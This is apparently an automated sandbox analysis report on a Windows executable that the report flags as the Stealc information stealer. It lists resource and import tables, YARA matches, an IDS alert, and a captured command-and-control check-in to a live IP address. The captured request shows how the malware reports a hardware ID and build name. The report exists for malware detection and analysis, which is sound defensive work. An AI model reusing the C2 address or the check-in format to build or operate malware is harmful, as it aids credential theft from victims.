RT_CURSOR	0x79b78	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x79ea8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_CURSOR	0x7a000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0x7aea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0x7b750	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_CURSOR	0x7bce8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x7cb90	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x7d438	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x60ac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3694029850746269
RT_ICON	0x60ac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3694029850746269
RT_ICON	0x61968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.4553249097472924
RT_ICON	0x61968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.4553249097472924
RT_ICON	0x62210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.4619815668202765
RT_ICON	0x62210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.4619815668202765
RT_ICON	0x628d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.4552023121387283
RT_ICON	0x628d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.4552023121387283
RT_ICON	0x62e40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.2682572614107884
RT_ICON	0x62e40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.2682572614107884
RT_ICON	0x653e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.3074577861163227
RT_ICON	0x653e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.3074577861163227
RT_ICON	0x66490	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.3599290780141844
RT_ICON	0x66490	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.3599290780141844
RT_ICON	0x66960	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.5652985074626866
RT_ICON	0x66960	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.5652985074626866
RT_ICON	0x67808	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5451263537906137
RT_ICON	0x67808	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5451263537906137
RT_ICON	0x680b0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.6213872832369942
RT_ICON	0x680b0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.6213872832369942
RT_ICON	0x68618	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.46172199170124484
RT_ICON	0x68618	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.46172199170124484
RT_ICON	0x6abc0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4920262664165103
RT_ICON	0x6abc0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4920262664165103
RT_ICON	0x6bc68	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.4954918032786885
RT_ICON	0x6bc68	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.4954918032786885
RT_ICON	0x6c5f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.450354609929078
RT_ICON	0x6c5f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.450354609929078
RT_ICON	0x6cac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3784648187633262
RT_ICON	0x6cac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3784648187633262
RT_ICON	0x6d968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5058664259927798
RT_ICON	0x6d968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5058664259927798
RT_ICON	0x6e210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5599078341013825
RT_ICON	0x6e210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5599078341013825
RT_ICON	0x6e8d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.583092485549133
RT_ICON	0x6e8d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.583092485549133
RT_ICON	0x6ee40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.37053941908713695
RT_ICON	0x6ee40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.37053941908713695
RT_ICON	0x713e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.41228893058161353
RT_ICON	0x713e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.41228893058161353
RT_ICON	0x72490	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.40081967213114755
RT_ICON	0x72490	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.40081967213114755
RT_ICON	0x72e18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.46897163120567376
RT_ICON	0x72e18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.46897163120567376
RT_ICON	0x732f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.3742004264392324
RT_ICON	0x732f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.3742004264392324
RT_ICON	0x741a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5171480144404332
RT_ICON	0x741a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5171480144404332
RT_ICON	0x74a48	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.6059907834101382
RT_ICON	0x74a48	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.6059907834101382
RT_ICON	0x75110	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6596820809248555
RT_ICON	0x75110	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6596820809248555
RT_ICON	0x75678	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	India	0.487551867219917
RT_ICON	0x75678	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	Sri Lanka	0.487551867219917
RT_ICON	0x77c20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	India	0.5060975609756098
RT_ICON	0x77c20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	Sri Lanka	0.5060975609756098
RT_ICON	0x78cc8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	India	0.4860655737704918
RT_ICON	0x78cc8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	Sri Lanka	0.4860655737704918
RT_ICON	0x79650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	India	0.5390070921985816
RT_ICON	0x79650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	Sri Lanka	0.5390070921985816
RT_DIALOG	0x7dc30	0x58	data			0.8977272727272727
RT_STRING	0x7dc88	0x2c6	data	Tamil	India	0.4830985915492958
RT_STRING	0x7dc88	0x2c6	data	Tamil	Sri Lanka	0.4830985915492958
RT_STRING	0x7df50	0x6b4	data	Tamil	India	0.42657342657342656
RT_STRING	0x7df50	0x6b4	data	Tamil	Sri Lanka	0.42657342657342656
RT_STRING	0x7e608	0x242	data	Tamil	India	0.4982698961937716
RT_STRING	0x7e608	0x242	data	Tamil	Sri Lanka	0.4982698961937716
RT_STRING	0x7e850	0x620	data	Tamil	India	0.4343112244897959
RT_STRING	0x7e850	0x620	data	Tamil	Sri Lanka	0.4343112244897959
RT_STRING	0x7ee70	0x292	data	Tamil	India	0.4817629179331307
RT_STRING	0x7ee70	0x292	data	Tamil	Sri Lanka	0.4817629179331307
RT_ACCELERATOR	0x79b30	0x48	data	Tamil	India	0.8472222222222222
RT_ACCELERATOR	0x79b30	0x48	data	Tamil	Sri Lanka	0.8472222222222222
RT_GROUP_CURSOR	0x79fd8	0x22	data			1.0294117647058822
RT_GROUP_CURSOR	0x7bcb8	0x30	data			0.9375
RT_GROUP_CURSOR	0x7d9a0	0x30	data			0.9375
RT_GROUP_ICON	0x6ca58	0x68	data	Tamil	India	0.7019230769230769
RT_GROUP_ICON	0x6ca58	0x68	data	Tamil	Sri Lanka	0.7019230769230769
RT_GROUP_ICON	0x668f8	0x68	data	Tamil	India	0.6826923076923077
RT_GROUP_ICON	0x668f8	0x68	data	Tamil	Sri Lanka	0.6826923076923077
RT_GROUP_ICON	0x73280	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x73280	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_GROUP_ICON	0x79ab8	0x76	data	Tamil	India	0.6779661016949152
RT_GROUP_ICON	0x79ab8	0x76	data	Tamil	Sri Lanka	0.6779661016949152
RT_VERSION	0x7d9d0	0x25c	data			0.5413907284768212

Imports

DLL	Import
KERNEL32.dll	InterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, SetFileTime, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, CreateJobObjectA, EnumCalendarInfoW, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, GlobalFree, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetShortPathNameW, GetDiskFreeSpaceExA, ReadConsoleInputW, GetCurrentProcessId, DebugBreak, GetTempPathA, LCMapStringW, EnumCalendarInfoA, InterlockedIncrement, CommConfigDialogA, GetConsoleAliasExesA, GetLocaleInfoA, SetFilePointer, VerifyVersionInfoW, WriteConsoleW, CloseHandle, FlushFileBuffers, GetConsoleMode, GetConsoleCP, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, TlsAlloc, TlsGetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, SetStdHandle, CreateFileW
GDI32.dll	GetCharWidthI, CreateDCA, CreateDCW, GetCharWidth32A
ADVAPI32.dll	ReadEventLogW
ole32.dll	CoSuspendClassObjects
WINHTTP.dll	WinHttpOpen, WinHttpCheckPlatform

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T03:52:04.363921+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	62.204.41.150	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 03:52:02.953155041 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 8, 2024 03:52:02.958199978 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 8, 2024 03:52:02.958530903 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 8, 2024 03:52:02.958530903 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 8, 2024 03:52:02.963416100 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 8, 2024 03:52:03.666327953 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 8, 2024 03:52:03.666629076 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 8, 2024 03:52:03.811660051 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 8, 2024 03:52:03.816556931 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 8, 2024 03:52:04.363717079 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 8, 2024 03:52:04.363920927 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 8, 2024 03:52:09.364485025 CEST	80	49704	62.204.41.150	192.168.2.5
Oct 8, 2024 03:52:09.364722967 CEST	49704	80	192.168.2.5	62.204.41.150
Oct 8, 2024 03:52:20.265671968 CEST	49704	80	192.168.2.5	62.204.41.150

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 03:52:44.930264950 CEST	53	59808	162.159.36.2	192.168.2.5
Oct 8, 2024 03:52:45.407331944 CEST	53	63970	1.1.1.1	192.168.2.5

HTTP Request Dependency Graph

62.204.41.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	62.204.41.150	80	5500	C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 03:52:02.958530903 CEST	88	OUT	GET / HTTP/1.1 Host: 62.204.41.150 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 03:52:03.666327953 CEST	203	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:52:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 8, 2024 03:52:03.811660051 CEST	418	OUT	POST /edd20096ecef326d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFC Host: 62.204.41.150 Content-Length: 218 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 42 41 30 32 44 45 30 34 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="hwid"4BBA02DE0439786254513------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="build"default6_cap------GCGHCBKFCFBFHIDHDBFC--
Oct 8, 2024 03:52:04.363717079 CEST	210	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:52:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	21:52:00
Start date:	07/10/2024
Path:	C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe"
Imagebase:	0x400000
File size:	454'144 bytes
MD5 hash:	E35C6AD41081DDCDA2BA9C65B5B1A6F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2204196068.000000000077D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2040364306.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:52:03
Start date:	07/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1308
Imagebase:	0x1a0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	6.7%
Signature Coverage:	12.7%
Total number of Nodes:	1425
Total number of Limit Nodes:	26

Executed Functions

Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
strlen.MSVCRT ref: 004046F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
